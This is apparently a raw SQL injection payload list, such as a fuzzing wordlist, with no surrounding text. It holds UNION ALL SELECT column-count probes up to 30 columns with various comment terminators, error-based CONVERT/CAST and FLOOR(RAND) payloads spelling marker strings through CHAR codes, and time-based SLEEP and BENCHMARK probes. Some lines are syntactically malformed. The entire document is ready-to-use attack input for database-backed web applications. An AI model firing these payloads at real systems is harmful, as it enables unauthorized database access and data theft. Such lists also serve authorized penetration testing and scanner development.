UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT NULL--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNION ALL SELECT NULL
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#